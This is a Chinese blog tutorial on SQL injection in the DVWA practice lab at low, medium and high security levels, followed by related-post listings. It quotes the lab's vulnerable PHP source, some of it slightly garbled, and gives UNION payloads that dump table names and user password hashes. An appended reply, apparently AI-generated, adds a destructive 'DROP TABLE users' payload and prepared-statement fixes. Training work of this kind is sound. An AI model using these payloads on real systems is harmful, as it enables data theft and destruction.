dvwa之sql注入学习(不同级别)

最新推荐文章于 2025-09-17 14:19:44 发布
原创 最新推荐文章于 2025-09-17 14:19:44 发布 · 4.9w 阅读 · 169 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍DVWA平台上的SQL注入实战过程,涵盖低、中、高级别注入技巧,包括利用SQL注入获取数据库信息、表名及列名的方法。

dvwa之sql注入学习(不同级别)

 

级别:Low

从页面上看到,有一个可以提交查询内容的地方

我们可以通过以下步骤判断这里是否存在注入点

① 输入1  提交

②输入1' 提交

③输入1 and 1=1 提交

④输入1 and 1=2提交

由上可以看出是存在注入点的,  我们猜测sql查询语句是这样的:  

select First name的列名 and Surname的列名 from 表名 where id的列名 ='我们输入的id'
我们看一下这里的源码  果然真的是这样,没有任何过滤

<?php

if( isset( $_REQUEST'Submit' ] ) ) {
    // Get input
    $id $_REQUEST'id' ];

    // Check database
    $query  "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res mysqli_connect_error()) ? $___mysqli_res false)) . '</pre>' );

    // Get results
    while( $row mysqli_fetch_assoc$result ) ) {
        // Get values
        $first $row["first_name"];
        $last  $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

 

?> 

那么我们首先爆出它的库试试,用单引号让id闭合

输入 1' union select1,database()#提交


可以看出目前使用的数据库为dvwa,接下来我们爆表试试

输入 1' union select1,table_name from information_schema.tables where table_name='dvwa'#


 

可以看到有两个表,我们爆一下users的列,

输入1' union select1,column_name from information_schema.columns where table_name='users'#


 

可以看出有好多的列,但是重要的应该是user列和password列,我们爆出这两列的字段内容

输入 1' union select1,concat(user,password) from users#

级别:Medium SQL Injection Source

这个级别我们可以看出,这是通过一个下拉表的方式提交数据的,

而且我们提交一个数据后发现URL如下

http://localhost/DVWA-1.9/vulnerabilities/sqli/#

所以不是get型注入,应该是把提交的数据存放到post数据中了

我们可以用hackbar试一下或者用burpsuite抓包试一下。先用hackbar试一下吧

添加post数据如下  点击run

得到返回的页面如下:

则我们就可以在这里添加注入语句了

添加post数据如下:

获得当前数据库为dvwa

使用burp suite

但是我们执行这句话时却报错了:id=2  union select1,table_name from information_schema.tables wheretable_name='dvwa'#&Submit=Submit

Low版本的就可以注入,中等的就不可以注入了,这是为什么呢?打开源码看一下:

Medium SQL Injection Source

<?php

 

if( isset( $_POST[ 'Submit' ] ) ) {

   // Get input

   $id = $_POST[ 'id' ];

    $id = mysql_real_escape_string($id );

 

   // Check database

   $query  = "SELECT first_name,last_name FROM users WHERE user_id = $id;";

   $result = mysql_query( $query ) or die( '<pre>' . mysql_error() .'</pre>' );

 

   // Get results

   $num = mysql_numrows( $result );

   $i   = 0;

   while( $i < $num ) {

       // Display values

       $first = mysql_result( $result, $i, "first_name" );

       $last  = mysql_result( $result,$i, "last_name" );

 

       // Feedback for end user

       echo "<pre>ID: {$id}<br />First name: {$first}<br/>Surname: {$last}</pre>";

 

        // Increase loop count

       $i++;

    }

 

   //mysql_close();

}

 

?>

发现有这样的一句话:$id = mysql_real_escape_string($id );

这句话是干什么用的呢?百度了一下知道

mysql_real_escape_string函数是实现转义 SQL 语句字符串中的特殊字符,如输入单引号’则处理时会在其前面加上右斜杠\来进行转义,如果语句错误则输出相应的错误信息。其中受影响的字符如下:

\x00  \n  \r  \ '  "  \x1a

那我们换这样的注入方式 只要不用’就行

id=2 union select 1,table_name from information_schema.tables wheretable_schema=(select database())#&Submit=Submit

 

High级别

 

发现就直接爆出来了  和low级别方法差不多,这里就不一一爆字段了

 

[网络安全]DVWASQL注入—High level解题简析 [网络安全]DVWASQL注入—High level解
2401_88752464的博客
01-05 486
由以上两个回显可知,该注入类型为字符型注入。由以上两个回显可知,注入点个数为两个。
DVWA-------简单的SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 2205
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA() -SQL注入
qq_42785117的博客
08-22 631
SQL Injection(SQL注入) 原理: 将恶意的sql语句拼接到合法的sql语句中。 类型: 字符型,数字型,搜索型。 注入流程: 判断是否存在注入注入是字符型还是数字型。 猜解sql查询语句中的字段数 确定显示位置 获取当前的数据库 获取数据库中的表 获取表中的字段名 下载数据 实验前须知: sql5.0以上版本与5.0以下的版本有个最根本的区别,多了一个information...
SQLmap使用教程(2025版),零基础入门到精通,看这一篇就够了!
最新发布
Cairo_A的博客
09-17 907
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap
dvwa——sql注入
GZY0601的博客
09-16 807
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
DVWA-SQL注入
qq_60848021的博客
06-25 1354
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWA系列】——SQL注入(布尔盲注)详细教程
2402_84408069的博客
07-10 1617
本文详细介绍了DVWA SQL布尔盲注(Blind SQL Injection)在Low级别的实战方法。通过分析漏洞原理,展示了手工注入的核心步骤:判断注入类型、猜解数据库名长度、逐字符猜解数据库名、表名及列名数据。文章提供了详细Payload和二分法等高效技巧,同时推荐使用sqlmap等工具加速渗透测试。最后强调了防御措施的重要性,包括参数化查询和输入过滤。附有免责声明,强调仅限合法授权下的安全研究。
DVWA靶场通关笔记-SQL注入(SQL Injection low级别)
mooyuan的网络安全博客
07-07 891
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
DvwaSQL 注入级别学习笔记
Mbys_Lettuce的博客
09-15 1188
SQL注入指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过不同的条件产生不同SQL语句,这是学习dvwasql注入的相关笔记。仅供学习。 ​
DVWASQL注入
geejkse_seff的博客
07-30 467
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA——SQL注入
m0_74426634的博客
04-07 1654
日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWASQL 注入
Hacker_feng的博客
10-02 855
1' or 1=2 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()# // 查询当前数据库dvwa 中的表。这里也可以通过输入union select 1,2,3…输入:1' union select 1,2#输入: 1' or '1'='1。
DVWA系列】——SQL注入——low详细教程
2402_84408069的博客
06-15 1792
摘要:本文针对DVWA中Low安全级别SQL注入漏洞进行详细分析。该级别因用户输入直接拼接SQL语句且无过滤,导致可通过单引号闭合进行注入攻击。文章演示了从探测注入点到获取数据库信息、表名、字段名及用户凭证的完整流程,并提供了防御建议,如使用预处理语句和输入过滤。同时对比了不同安全级别的防护措施,强调预处理语句是根治方案。本教程仅用于教育目的,实际渗透需授权进行。
DVWA通过攻略之SQL注入_dvwa sql注入(1)
2401_84968303的博客
05-12 1591
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[DVWA靶场实战]-SQL注入攻击(命令注入+SQL回显注入+sqlmap工具实现自动化注入)详细教程
weixin_60838266的博客
07-24 3682
利用Kali Linux和burpsuite对DVWA靶场的Command Injection模块和SQL Injection模块进行sql注入攻击详细教程,包括使用工具sqlmap进行自动化注入攻击。
dvwasql注入
03-30
<think>好的,我现在需要处理用户关于DVWASQL注入的请求。首先,用户想要了解相关的教程或示例,我得确保回答结构清晰,符合他们提供的系统级指令。 首先,我应该回忆一下DVWA的基本情况。DVWA是一个用于练习Web应用漏洞的平台,包含SQL注入等模块。用户可能需要知道如何配置环境,所以第一步可能需要介绍如何设置安全等级为Low,因为不同等级对应不同的防护措施,而Low是最基础的,适合演示注入原理。 接下来,用户可能需要具体的示例和步骤。我需要分步骤解释如何在Low级别下进行注入,比如输入' or '1'='1之类的Payload,并解释其原理。同时,要确保所有数学表达式和代码正确使用LaTeX格式,比如变量用$包裹,代码块用三个反引号标注语言。 然后,用户可能想知道其他安全等级的情况,比如Medium和High,以及如何防范SQL注入。这时候需要分点说明每个等级的不同防护措施,例如Medium使用下拉菜单和mysql_real_escape_string,而High使用更复杂的Token机制。同时,提供防御措施,比如预处理语句和输入过滤,并引用提供的参考资料,比如引用[1]和[2]。 还要注意生成相关问题,这可能包括不同等级的注入方法、如何绕过防护以及防范的最佳实践。确保问题与用户查询相关,并且能够引导他们深入理解。 另外,必须检查是否有正确的引用标识,比如在提到防御方法时引用[^1]和[^2],以及在渗透测试资源处引用[^3]。需要确保引用标记自然放置在相关段落的末尾,而不是生硬添加。 最后,要确保整个回答使用中文,语言流畅,结构清晰,分步骤说明,并且包含代码示例和引用。同时避免使用任何Markdown格式,除了代码块和引用标识。需要检查LaTeX是否正确,比如$符号的使用,以及独立公式是否用$$包裹,但在这个回答中可能数学表达式不多,主要集中在代码示例上。 可能还需要验证用户提供的引用链接是否与内容相关,比如引用[1]是关于快速排序的,但用户的问题是关于SQL注入的,所以可能需要调整引用的使用,确保引用内容与上下文相关。例如,在提到安全资源共享时引用,在渗透测试工具时引用。 总结,回答的结构应该是先介绍DVWASQL注入的基本设置,然后分步骤讲解不同安全等级的注入方法,提供代码示例,接着讨论防御措施,最后生成相关问题,并正确引用提供的参考资料。</think># DVWA SQL注入教程与示例分析 ## 一、环境准备 1. 安装DVWA:需部署PHP环境(推荐XAMPP/WAMP),下载DVWA源码解压至Web目录 2. 设置安全等级:登录后进入"DVWA Security",将安全级别设为**Low**(原始无防护状态) 3. 访问注入页面:导航栏选择"SQL Injection" ## 二、Low级别注入 ### 步骤演示 ```sql 用户ID输入框输入:' or '1'='1 等效SQL语句: SELECT first_name, last_name FROM users WHERE user_id = '' or '1'='1' ``` 此时会返回所有用户数据(如图1所示)。该漏洞源于直接拼接用户输入: $$sql = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";$$ ### 其他Payload示例 1. `' UNION SELECT user, password FROM users#`(获取凭证数据) 2. `'; DROP TABLE users;-- `(破坏性注入) ## 三、中级(Medium)防护 当安全级别设为Medium时: 1. 输入方式变为**下拉菜单** 2. 后端使用`mysql_real_escape_string()`过滤 3. 绕过方法:通过Burp Suite拦截修改POST参数 ## 四、高级(High)防护 安全级别High时: 1. 使用Session验证Token 2. 输入限制为单条查询 3. 绕过需要结合二次注入技术 ## 五、防御措施 1. 使用预处理语句: ```php $stmt = $db->prepare("SELECT first_name FROM users WHERE user_id = ?"); $stmt->bind_param("i", $id); ``` 2. 实施输入过滤:`preg_match('/^[0-9]+$/', $_GET['id'])` 3. 最小化数据库权限
评论 19
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值